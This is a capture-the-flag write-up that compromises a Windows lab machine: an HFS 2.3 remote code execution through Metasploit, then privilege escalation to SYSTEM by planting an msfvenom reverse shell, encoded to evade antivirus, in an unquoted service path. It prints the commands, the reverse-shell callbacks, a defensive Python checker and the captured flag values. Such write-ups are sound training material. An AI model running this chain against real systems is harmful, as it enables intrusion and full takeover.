Steel Mountain
Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
Initial Reconnaissance
Service Scanning
$ sudo nmap -A -v 10.10.93.9
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 124 Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 124 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 124 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack ttl 124 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: STEELMOUNTAIN
| NetBIOS_Domain_Name: STEELMOUNTAIN
| NetBIOS_Computer_Name: STEELMOUNTAIN
| DNS_Domain_Name: steelmountain
| DNS_Computer_Name: steelmountain
| Product_Version: 6.3.9600
|_ System_Time: 2025-07-25T06:33:41+00:00
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-07-24T06:25:59
| Not valid after: 2026-01-23T06:25:59
| MD5: 1582:11a8:377b:5b2f:d69b:06ff:dfcb:d193
| SHA-1: 0060:75ef:57d8:5495:034e:cd99:4529:372c:0b65:85f2
|_ssl-date: 2025-07-25T06:33:48+00:00; 0s from scanner time.
5985/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http syn-ack ttl 124 HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
47001/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49162/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
49164/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2012
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
OS details: Microsoft Windows Server 2012 or 2012 R2

From the scan results we know the target is running Windows Server 2012 or 2012 R2. Port 80 serves Microsoft IIS 8.5. Port 445 exposes SMB, together with ports 135 and 139 and a range of dynamic RPC ports (49152–49164). Port 3389 has Remote Desktop (RDP) enabled. Most notable is port 8080, which runs HttpFileServer (HFS) 2.3, a version with a history of Remote Code Execution exploits. In addition, WinRM is listening on ports 5985 and 47001, which could be used for remote shell access or privilege escalation once credentials are obtained.
HTTP 80

Visiting the main page, we see that Bill Harper is the employee of the month 🙂.
HTTP 8080
Port 8080 is running HFS. HTTP File Server, also known as HFS, is a free web server designed specifically for publishing and sharing files.


Remote Code Execution
The Rejetto HttpFileServer version in use is 2.3, which is affected by the vulnerability CVE-2014-6287.

Here is the exploit 39161.py for this vulnerability:

Meterpreter Shell as bill
We have successfully exploited the vulnerability and gained access to the system through Metasploit as user bill.
msf6 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_rce_cve_2024_23692 2024-05-25 excellent Yes Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.93.9
rhosts => 10.10.93.9
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.17.21.52
lhost => 10.17.21.52
msf6 exploit(windows/http/rejetto_hfs_exec) > set lport 4242
lport => 4242
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.10.93.9 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.17.21.52 yes The listen address (an interface may be specified)
LPORT 4242 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.17.21.52:4242
[*] Using URL: http://10.17.21.52:8080/HQiAmKTCR3Ej5
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /HQiAmKTCR3Ej5
[*] Sending stage (177734 bytes) to 10.10.93.9
[!] Tried to delete %TEMP%\xCfoxhId.vbs, unknown result
[*] Meterpreter session 1 opened (10.17.21.52:4242 -> 10.10.93.9:49284) at 2025-07-25 14:02:48 +0700
[*] Server stopped.
meterpreter > shell

System Info
Based on the output of the systeminfo command, the target is running the 64-bit edition of Windows Server 2012 R2 Datacenter.

user.txt
meterpreter > shell
Process 1800 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
whoami
steelmountain\bill
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
07/25/2025 12:02 AM <DIR> .
07/25/2025 12:02 AM <DIR> ..
07/25/2025 12:02 AM <DIR> %TEMP%
02/16/2014 01:58 PM 760,320 hfs.exe
1 File(s) 760,320 bytes
3 Dir(s) 44,171,792,384 bytes free
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>cd C:\Users\bill\Desktop
cd C:\Users\bill\Desktop
C:\Users\bill\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\Desktop
09/27/2019 09:08 AM <DIR> .
09/27/2019 09:08 AM <DIR> ..
09/27/2019 05:42 AM 70 user.txt
1 File(s) 70 bytes
2 Dir(s) 44,171,792,384 bytes free
C:\Users\bill\Desktop>type user.txt
type user.txt
b04763b6fcf51fcd7c13abc7db4fd365

Shell as SYSTEM
PowerUp is a tool for enumerating privilege escalation vectors, developed in the PowerSploit repository, which can be found here:

Because PowerUp is a PowerShell script, we need a PowerShell session on the target machine in order to run it.
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > ls
Directory: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 7/25/2025 12:02 AM %TEMP%
-a--- 2/16/2014 12:58 PM 760320 hfs.exe
-a--- 7/25/2025 12:12 AM 600580 PowerUp.ps1
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

The service AdvancedSystemCareService9 was found not only to use an unquoted path, but also to be restartable and, more importantly, to run as LocalSystem. This is a serious security risk, because an attacker could exploit it to execute arbitrary code with the highest privileges.

Because user bill has write access to the directory C:\Program Files (x86)\IObit, if the bill account is compromised an attacker could place a malicious file named Advanced.exe in this directory and trigger it by restarting the AdvancedSystemCareService9 service.
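As an added audit example (not part of the original writeup and not PowerUp's code), the following Python computes which paths Windows tries when starting a service whose unquoted ImagePath contains spaces, and therefore which directories must deny write access to ordinary users. The service list and every ImagePath in it are constructed for the example; the real binary path of AdvancedSystemCareService9 is not shown in this writeup.

```python
import ntpath
import re

SAMPLE_SERVICES = [  # (name, path_name, start_name); constructed, not taken from the target
    ("AdvancedSystemCareService9", r"C:\Program Files (x86)\IObit\Advanced SystemCare\service.exe", "LocalSystem"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\svc.exe" -run', "LocalSystem"),
    ("NoSpaceSvc", r"C:\Windows\system32\svchost.exe -k netsvcs", "LocalSystem"),
]

def executable_part(image_path: str) -> str:
    """Return the executable portion of an ImagePath (up to the first '.exe'
    token), ignoring any arguments that follow it."""
    m = re.match(r"(?i)(.*?\.exe)(\s|$)", image_path.strip())
    return m.group(1) if m else image_path.strip()

def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the path is not wrapped in quotes and the executable path
    itself contains a space: the precondition for the unquoted-path weakness."""
    if image_path.strip().startswith('"'):
        return False
    return " " in executable_part(image_path)

def lookup_candidates(image_path: str) -> list:
    """Paths CreateProcess tries, in order, for an unquoted path with spaces:
    each prefix that ends at a space with '.exe' appended, then the full path."""
    exe = executable_part(image_path)
    parts = exe.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(exe)
    return candidates

def audit(services: list) -> list:
    """Flag LocalSystem services with an unquoted path and list the directories
    whose ACLs must stop ordinary users from creating the hijack candidates."""
    findings = []
    for name, path, start in services:
        if start.lower() != "localsystem":
            continue
        if not is_unquoted_with_spaces(path):
            continue
        cands = lookup_candidates(path)
        dirs = sorted({ntpath.dirname(c) for c in cands[:-1]})
        findings.append({"name": name, "candidates": cands,
                         "dirs_to_lock_down": dirs})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f["name"], "->", f["dirs_to_lock_down"])
```

For the constructed path, the second-to-last candidate is C:\Program Files (x86)\IObit\Advanced.exe, which is exactly why a writable IObit directory matters; the same routine generalises to any unquoted service path.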

We create a reverse shell payload with msfvenom, using the x86/shikata_ga_nai encoder to evade AV detection, then upload the payload to the target with the Meterpreter shell's upload command.
┌──(hungnt㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.17.21.52 LPORT=4444 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe-service file: 15872 bytes
Saved as: Advanced.exe
meterpreter > cd 'C:\Program Files (x86)\IObit\'
meterpreter > upload ~/Advanced.exe
[*] Uploading : /home/hungnt/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/hungnt/Advanced.exe -> Advanced.exe
[*] Completed : /home/hungnt/Advanced.exe -> Advanced.exe
meterpreter > shell
Process 1736 created.
Channel 3 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\IObit>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Program Files (x86)\IObit
07/25/2025 12:46 AM <DIR> .
07/25/2025 12:46 AM <DIR> ..
07/25/2025 12:46 AM <DIR> Advanced SystemCare
07/25/2025 12:46 AM 15,872 Advanced.exe
09/26/2019 10:35 PM <DIR> IObit Uninstaller
09/26/2019 08:18 AM <DIR> LiveUpdate
1 File(s) 15,872 bytes
5 Dir(s) 44,172,189,696 bytes free

To execute the payload, the service must first be stopped and then started again.
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Program Files (x86)\IObit>sc query AdvancedSystemCareService9
sc query AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

Before restarting the service, we must set up a listener to catch the reverse shell connection.
msf6 exploit(multi/handler) > options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.17.21.52 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.17.21.52:4444

After restarting the service, we have successfully escalated privileges to SYSTEM.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2636
FLAGS :

[*] Started reverse TCP handler on 10.17.21.52:4444
[*] Command shell session 1 opened (10.17.21.52:4444 -> 10.10.137.40:49229) at 2025-07-25 14:58:34 +0700
Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
C:\Windows\system32>whoami
whoami
nt authority\system

root.txt
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\Administrator\Desktop
10/12/2020 12:05 PM <DIR> .
10/12/2020 12:05 PM <DIR> ..
10/12/2020 12:05 PM 1,528 activation.ps1
09/27/2019 05:41 AM 32 root.txt
2 File(s) 1,560 bytes
2 Dir(s) 44,158,586,880 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80